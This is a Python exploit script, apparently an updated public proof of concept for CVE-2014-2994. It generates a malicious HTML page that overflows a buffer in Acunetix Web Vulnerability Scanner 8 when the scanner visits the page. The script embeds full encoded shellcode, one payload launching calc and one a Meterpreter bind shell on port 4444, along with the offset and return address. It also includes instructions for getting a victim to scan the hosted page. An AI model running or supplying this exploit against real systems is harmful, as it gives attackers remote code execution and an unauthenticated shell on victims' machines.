
Acunetix 8 Scanner Buffer Overflow

Posted on 25 April 2014

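#!/usr/bin/env python3
# Title: Acunetix Web Vulnerability Scanner Buffer Overflow Exploit
# Version: 8
# Build: 20120704
# Tested on: Windows XP SP2 en
# Vendor: http://www.acunetix.com/
# Original Advisory: http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Exploit-Author: Osanda Malith
# Follow @OsandaMalith
# Exploit write-up: http://osandamalith.wordpress.com/2014/04/24/pwning-script-kiddies-acunetix-buffer-overflow/
# /!\ Author is not responsible for any damage you cause
# This POC is for educational purposes only
# Video: https://www.youtube.com/watch?v=RHaMx8K1GeM
# CVE: CVE-2014-2994
"""Generate Exploit.htm for CVE-2014-2994 (Acunetix WVS 8, build 20120704).

Host the generated file in a server. The victim should select the external
host. Otherwise we cannot trigger the vulnerability.

Review notes.  This listing was restored from a web rendering that had
stripped every backslash (each hex escape lost its leading backslash, so
x54 stood where backslash-x54 belongs, and the escaped quotes inside the
HTML strings lost their escape) and collapsed the whole script onto a few
lines.  The bytes below are the page's bytes, re-escaped; nothing was added.

* Python 3 only now; the original was Python 2 (raw_input, print statements).
  Every user-visible message is unchanged.
* The page is written in binary mode so the bytes on disk are exactly the
  payload string.  A text-mode write on Python 3 goes through the locale
  encoding and newline translation, which can silently corrupt a payload.
* Everything target-specific (the offset, the EDX filler, the jmp esp
  address in WINHTTP.dll 5.1.2600.2180) comes from the original listing and
  applies only to the tested build, Windows XP SP2 (en).
* The bind-shell payload opens an unauthenticated listener on TCP/4444 on
  whatever machine runs the scanner.  Use it only in an isolated lab.
"""

# Calculator payload.  x86/alpha_mixed output: the decoder prologue (push esp /
# pop ecx, then the "IIII...7QZjAXP0A0..." stub) is identical to the bind
# shell's, so presumably the same encoder settings were used; the exact
# msfpayload command line is not recorded in the original listing.
CALC_SHELLCODE = (
    "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
    "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
    "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    "\x49\x6c\x6d\x38\x6e\x69\x75\x50\x73\x30\x77\x70\x63"
    "\x50\x6f\x79\x68\x65\x30\x31\x49\x42\x63\x54\x4c\x4b"
    "\x31\x42\x46\x50\x4c\x4b\x46\x32\x44\x4c\x6e\x6b\x70"
    "\x52\x46\x74\x4c\x4b\x64\x32\x34\x68\x64\x4f\x4e\x57"
    "\x30\x4a\x35\x76\x66\x51\x69\x6f\x64\x71\x69\x50\x6e"
    "\x4c\x65\x6c\x71\x71\x61\x6c\x77\x72\x74\x6c\x31\x30"
    "\x69\x51\x4a\x6f\x54\x4d\x53\x31\x69\x57\x39\x72\x58"
    "\x70\x71\x42\x53\x67\x6e\x6b\x63\x62\x74\x50\x6e\x6b"
    "\x53\x72\x57\x4c\x77\x71\x48\x50\x6c\x4b\x37\x30\x31"
    "\x68\x4e\x65\x4b\x70\x43\x44\x31\x5a\x36\x61\x58\x50"
    "\x62\x70\x6c\x4b\x31\x58\x34\x58\x6e\x6b\x42\x78\x77"
    "\x50\x36\x61\x38\x53\x6b\x53\x67\x4c\x57\x39\x4e\x6b"
    "\x77\x44\x4e\x6b\x47\x71\x69\x46\x34\x71\x49\x6f\x64"
    "\x71\x39\x50\x6c\x6c\x6f\x31\x7a\x6f\x46\x6d\x47\x71"
    "\x69\x57\x35\x68\x59\x70\x71\x65\x49\x64\x57\x73\x33"
    "\x4d\x6a\x58\x35\x6b\x43\x4d\x67\x54\x31\x65\x6d\x32"
    "\x61\x48\x6c\x4b\x51\x48\x34\x64\x66\x61\x6e\x33\x35"
    "\x36\x6c\x4b\x66\x6c\x30\x4b\x4e\x6b\x43\x68\x45\x4c"
    "\x33\x31\x4a\x73\x4c\x4b\x53\x34\x4e\x6b\x53\x31\x4e"
    "\x30\x4c\x49\x37\x34\x54\x64\x54\x64\x73\x6b\x31\x4b"
    "\x31\x71\x52\x79\x42\x7a\x53\x61\x79\x6f\x69\x70\x42"
    "\x78\x63\x6f\x43\x6a\x6c\x4b\x77\x62\x7a\x4b\x6c\x46"
    "\x53\x6d\x70\x6a\x57\x71\x4c\x4d\x4e\x65\x6e\x59\x53"
    "\x30\x45\x50\x47\x70\x52\x70\x52\x48\x44\x71\x6e\x6b"
    "\x42\x4f\x4b\x37\x6b\x4f\x78\x55\x4d\x6b\x6b\x50\x45"
    "\x4d\x56\x4a\x47\x7a\x50\x68\x4f\x56\x4e\x75\x6f\x4d"
    "\x4f\x6d\x59\x6f\x68\x55\x77\x4c\x46\x66\x51\x6c\x65"
    "\x5a\x6d\x50\x6b\x4b\x4b\x50\x44\x35\x56\x65\x6f\x4b"
    "\x71\x57\x64\x53\x54\x32\x42\x4f\x53\x5a\x33\x30\x61"
    "\x43\x49\x6f\x68\x55\x33\x53\x33\x51\x52\x4c\x43\x53"
    "\x65\x50\x41\x41"
)

# Bind shell payload.  Generated with:
#   msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R |
#   msfencode -e x86/alpha_mixed -t python BufferRegister=ESP
# (the original comment read "shellcodeferRegister=ESP": the author's
# buf -> shellcode rename also hit the word "BufferRegister").
# Modify this with your own custom shellcode if needed.  The original chose an
# asciiprint/alphanum jmp esp and an alphanumeric encoder, so presumably the
# overflowed buffer only tolerates printable bytes; keep that in mind.
BIND_SHELLCODE = (
    "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
    "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
    "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    "\x69\x6c\x4b\x58\x6c\x49\x65\x50\x73\x30\x73\x30\x31"
    "\x70\x6e\x69\x48\x65\x70\x31\x59\x42\x55\x34\x4c\x4b"
    "\x42\x72\x76\x50\x6c\x4b\x73\x62\x76\x6c\x4c\x4b\x53"
    "\x62\x57\x64\x6e\x6b\x63\x42\x34\x68\x66\x6f\x48\x37"
    "\x30\x4a\x54\x66\x55\x61\x79\x6f\x55\x61\x4b\x70\x4c"
    "\x6c\x35\x6c\x30\x61\x33\x4c\x75\x52\x64\x6c\x67\x50"
    "\x6f\x31\x5a\x6f\x54\x4d\x47\x71\x48\x47\x6b\x52\x38"
    "\x70\x61\x42\x46\x37\x6e\x6b\x32\x72\x66\x70\x6e\x6b"
    "\x73\x72\x75\x6c\x73\x31\x4e\x30\x6e\x6b\x71\x50\x43"
    "\x48\x4b\x35\x49\x50\x61\x64\x72\x6a\x33\x31\x78\x50"
    "\x76\x30\x4c\x4b\x77\x38\x35\x48\x6e\x6b\x53\x68\x61"
    "\x30\x65\x51\x5a\x73\x69\x73\x77\x4c\x50\x49\x4e\x6b"
    "\x56\x54\x6e\x6b\x45\x51\x69\x46\x75\x61\x6b\x4f\x66"
    "\x51\x49\x50\x6c\x6c\x4b\x71\x78\x4f\x56\x6d\x35\x51"
    "\x4a\x67\x50\x38\x59\x70\x61\x65\x39\x64\x67\x73\x31"
    "\x6d\x6a\x58\x45\x6b\x43\x4d\x76\x44\x50\x75\x49\x72"
    "\x52\x78\x6e\x6b\x61\x48\x46\x44\x43\x31\x68\x53\x45"
    "\x36\x4e\x6b\x34\x4c\x42\x6b\x6e\x6b\x73\x68\x35\x4c"
    "\x57\x71\x6b\x63\x4c\x4b\x53\x34\x6c\x4b\x43\x31\x4e"
    "\x30\x4e\x69\x32\x64\x47\x54\x56\x44\x73\x6b\x61\x4b"
    "\x75\x31\x31\x49\x72\x7a\x76\x31\x59\x6f\x59\x70\x61"
    "\x48\x51\x4f\x31\x4a\x6c\x4b\x52\x32\x78\x6b\x6e\x66"
    "\x43\x6d\x42\x48\x67\x43\x45\x62\x37\x70\x63\x30\x72"
    "\x48\x42\x57\x32\x53\x76\x52\x31\x4f\x42\x74\x50\x68"
    "\x52\x6c\x64\x37\x64\x66\x44\x47\x39\x6f\x69\x45\x4d"
    "\x68\x5a\x30\x65\x51\x57\x70\x63\x30\x76\x49\x59\x54"
    "\x31\x44\x52\x70\x45\x38\x64\x69\x4f\x70\x50\x6b\x57"
    "\x70\x59\x6f\x7a\x75\x52\x70\x52\x70\x32\x70\x52\x70"
    "\x47\x30\x30\x50\x67\x30\x66\x30\x63\x58\x48\x6a\x54"
    "\x4f\x49\x4f\x69\x70\x79\x6f\x4e\x35\x4c\x57\x45\x61"
    "\x6b\x6b\x51\x43\x73\x58\x73\x32\x57\x70\x34\x51\x73"
    "\x6c\x6f\x79\x4a\x46\x42\x6a\x76\x70\x46\x36\x50\x57"
    "\x71\x78\x7a\x62\x4b\x6b\x70\x37\x72\x47\x6b\x4f\x48"
    "\x55\x62\x73\x51\x47\x72\x48\x4c\x77\x78\x69\x47\x48"
    "\x4b\x4f\x69\x6f\x48\x55\x30\x53\x52\x73\x53\x67\x45"
    "\x38\x62\x54\x5a\x4c\x67\x4b\x6d\x31\x69\x6f\x5a\x75"
    "\x72\x77\x6c\x57\x62\x48\x54\x35\x50\x6e\x32\x6d\x35"
    "\x31\x4b\x4f\x69\x45\x61\x7a\x77\x70\x32\x4a\x73\x34"
    "\x62\x76\x61\x47\x70\x68\x63\x32\x78\x59\x4a\x68\x31"
    "\x4f\x49\x6f\x48\x55\x6e\x6b\x46\x56\x51\x7a\x71\x50"
    "\x62\x48\x65\x50\x46\x70\x63\x30\x43\x30\x31\x46\x32"
    "\x4a\x55\x50\x71\x78\x31\x48\x49\x34\x66\x33\x6b\x55"
    "\x59\x6f\x4e\x35\x4f\x63\x72\x73\x71\x7a\x37\x70\x30"
    "\x56\x70\x53\x71\x47\x45\x38\x74\x42\x38\x59\x6f\x38"
    "\x33\x6f\x49\x6f\x69\x45\x67\x71\x79\x53\x76\x49\x6b"
    "\x76\x6f\x75\x48\x76\x62\x55\x58\x6c\x49\x53\x41\x41"
)

# Menu number -> (payload, message printed once that payload is selected).
PAYLOADS = {
    1: (CALC_SHELLCODE, None),
    2: (BIND_SHELLCODE, "[+] Connect on port 4444"),
}

# Page prefix; the whitespace between the tags is what the source page showed.
HEAD = "<html> <body> <center><h1>Scan This Site and Get Pwned :)</h1></center><br>"
# Offset filler inside the href.  The source page showed the run of A's broken
# into four pieces (75 + 93 + 93 + 7) where the original used backslash line
# continuation inside one string literal, so it is one run of 268 bytes here.
# NOTE(review): if EIP is not hit on the tested build, re-check this count
# against the write-up before suspecting anything else.
JUNK = " <a href= \"http://" + "A" * 268
# Four printable bytes that, going by the original's variable name, presumably
# land in EDX before the return address is used.  Kept verbatim.
EDX = "500f"
JUNK2 = "BBBB"
# jmp esp | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [WINHTTP.dll]
# ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.2180
# (C:\WINDOWS\system32\WINHTTP.dll) -> 0x4d526349, written little-endian.
EIP = "\x49\x63\x52\x4d"
# Closes the href attribute and the <a> tag right after the payload (the
# original appended this to the shellcode variable itself).
CLOSE_HREF = "\">"
TAIL = "<img src=\"http://i.imgur.com/BimAoR0.jpg\"> </body> </html>"


def build_exploit(shellcode: str) -> str:
    """Return the malicious HTML page carrying *shellcode*.

    Layout, all inside one ``<a href="http://...">`` attribute:
    ``HEAD + JUNK + EDX + JUNK2 + EIP + shellcode + CLOSE_HREF + TAIL``,
    i.e. the original ``head + junk + edx + junk2 + eip + shellcode + tail``.
    """
    return "".join((HEAD, JUNK, EDX, JUNK2, EIP, shellcode, CLOSE_HREF, TAIL))


def write_exploit(exploit: str, filename: str = "Exploit.htm") -> int:
    """Write *exploit* to *filename* as raw bytes and return the byte count.

    Binary mode keeps the payload untouched (no newline translation, no locale
    encoding).  latin-1 maps each code point 0..255 to the same byte value,
    which is what the Python 2 ``str`` write produced; the payloads here are
    all printable ASCII anyway.
    """
    data = exploit.encode("latin-1")
    with open(filename, "wb") as out:
        out.write(data)
    return len(data)


def choose_payload() -> str:
    """Prompt until a valid menu number is entered and return its payload.

    Non-numeric input and unknown numbers re-prompt with the original
    messages; selecting the bind shell prints its connect hint.
    """
    while True:
        try:
            choice = int(input("[?] Choose your payload: 1. Calculator 2. Bind Shell "))
        except ValueError:
            print("[!] Enter only a number")
            continue
        if choice not in PAYLOADS:
            print("[-] Invalid Choice")
            continue
        shellcode, message = PAYLOADS[choice]
        if message:
            print(message)
        return shellcode


def main() -> None:
    """Interactive entry point: pick a payload and write Exploit.htm."""
    print('[~] Acunetix Web Vulnerability Scanner Buffer Overflow Exploit ')
    exploit = build_exploit(choose_payload())
    written = write_exploit(exploit)
    print("[~] " + str(written) + " Bytes written to file")


if __name__ == "__main__":
    main()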

 

